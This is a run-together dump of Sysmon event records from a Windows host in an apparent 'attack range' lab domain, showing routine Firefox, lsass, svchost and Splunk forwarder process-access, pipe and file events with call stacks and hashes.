Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.399{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.384{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-4C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.384{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-4C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.362{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.362{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.362{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.10.95409130C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.10.95409130C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.9.17520500C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 18141800x8000000000000000288176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.362{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.346{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83A1B04B0144D29B12C9C127A1AF482,SHA256=71B49ADB1B8AD4EEF0A21781C7D0FDD0AE0F5D90137CA3DE30B619BAA0B57BC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.331{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.331{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e31d78|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+19eea33|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.321{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.9.175205004\1728062997" -childID 5 -isForBrowser -prefsHandle 4472 -prefMapHandle 4476 -prefsLen 5798 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 4500 157ec02c548 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000288163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 